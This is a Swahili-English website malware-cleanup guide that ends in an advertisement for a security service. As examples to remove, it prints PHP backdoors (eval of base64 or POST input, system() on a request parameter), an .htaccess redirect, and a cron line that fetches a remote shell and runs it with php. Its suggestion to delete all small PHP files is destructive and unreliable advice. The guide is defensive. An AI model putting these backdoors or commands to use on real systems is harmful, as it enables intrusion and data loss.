Remove or Clean the Infected Code
Baada ya kutambua kwamba kuna malware au suspicious code kwenye website yako, hatua inayofuata ni kuondoa na kusafisha ili kurudisha website katika hali salama. Usafi wa code unahitaji umakini, kwa sababu ukifuta file ambalo ni la system linalohitajika — website inaweza kushindwa kufanya kazi.
Hapa chini ni mwongozo kamili wa hatua kwa hatua.
🟣 1. Backup Kwanza Kabisa
Kabla ya kufanya chochote, tengeneza backup ya website:
cp -r /var/www/html /var/www/html-backup
Backup ni muhimu kwa sababu:
Ukifuta kitu kimakosa unaweza kurudisha.
Malware cleanup wakati mwingine huleta conflicts.
🟣 2. Delete Suspicious Files (Haraka na Salama)
Ikiwa umeona file ambalo halitakiwi kama:
shell.php
mailer.php
b374k.php
wso2.php
test123.php
Futa mara moja:
rm /var/www/html/filename.php
Au futa files zote never-used kwa size:
find /var/www/html -name "*.php" -size -5k -delete
⚠️ Usifute files za system bila kuangalia content yake.
🟣 3. Clean Malicious Code Ndani ya File (Safisha Bila Kufuta File)
Wakati mwingine malware imeingizwa ndani ya file halisi kama:
index.php
wp-config.php
header.php
functions.php
config.php
Mfano 1: Malicious encoded code
<?php
eval(base64_decode("aWYoIWZ1bm..."));
?>
👉 Jinsi ya kusafisha
Futa kabisa block ya malicious code:
<?php
// Cleaned: malicious code removed
?>
Mfano 2: Hidden backdoor via system()
Malware:
<?php
if(isset($_REQUEST['cmd'])){
system($_REQUEST['cmd']);
}
?>
Solution:
<?php
// CLEANED: backdoor removed
?>
Mfano 3: Strange POST/COOKIE executors
<?php
$code = $_POST['evil'];
eval($code);
Remove immediately:
<?php
// CLEANED
?>
🟣 4. Fix Core Files Using CMS Tools (WordPress, Joomla, etc.)
WordPress
wp core verify-checksums
wp core download --force
Hii inarudisha core files original bila malware.
🟣 5. Use ClamAV to Remove Infected Files
clamscan -r --remove /var/www/html
Inafaa kwa:
PHP shells
Infected uploads
Scripts zenye signature ya malware
🟣 6. Clean .htaccess Malware
Mara nyingi hacker huingiza redirects ndani ya .htaccess.
Malware mfano:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} .*google.* [NC]
RewriteRule ^(.*)$ http://malicious-site.com [L]
👉 Futa haya na uache .htaccess original:
# CLEAN .htaccess
🟣 7. Remove Suspicious Cron Jobs
Malware nyingi hujaribu kujirudia kupitia CRON.
Check CRON
crontab -l
Delete suspicious jobs
crontab -e
Futa entries kama:
* * * * * curl http://bad-site.com/shell.txt | php
🟣 8. Check Uploaded Files Folder
Hackers hupenda kuficha:
.php files
.phtml files
Hidden scripts
Katika uploads/, images/, documents/
Quickly find PHP files inside uploads
find /var/www/html/wp-content/uploads -name "*.php"
Futa zozote ambazo si za system.
🟣 9. Re-upload Clean Theme/Plugin Files
Ikiwa damage ni kubwa, step bora ni:
Download theme/plugin original
Overwrite ile iliyo-infected
Hii imethibitishwa kuwa safe zaidi kuliko kujaribu kusafisha manually.
🟣 10. Check File Permissions na Kuzirekebisha
Infected sites mara nyingi zina 777 permissions.
Set recommended permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
🟣 11. Final Scan After Cleaning
Scan again kuhakikisha hakuna malware iliyobaki.
clamscan -r /var/www/html
rkhunter --check
chkrootkit
🧩 Hitimisho
Kusafisha infected code kunahitaji:
Utulivu
Backup
Scanning
Manual cleanup
Core file replacement
Ukifuata hatua hizi, utaondoa malware yote vizuri bila kuharibu website.
📞 Unahitaji Malware Cleaning / Complete Security Hardening?
Ninaweza kukusaidia 100%:
Malware removal
File scanning
Core file integrity fixes
Server hardening
Protection ya website yako isirudiwe tena
📞 WhatsApp: https://wa.me/255693118509
🌐 Website: https://www.faulink.com
🚀 Unahitaji mfumo au website ya biashara?
Chagua huduma hapa chini kisha mteja bofya moja kwa moja kwenda kwenye ukurasa wa huduma au kuwasiliana nasi kwa WhatsApp.